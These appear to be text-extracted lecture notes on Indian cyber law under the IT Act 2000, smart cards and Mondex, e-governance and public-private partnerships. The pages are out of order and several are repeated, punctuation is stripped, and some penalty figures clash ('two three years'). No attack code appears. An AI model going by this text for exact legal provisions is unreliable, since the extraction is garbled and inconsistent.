PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
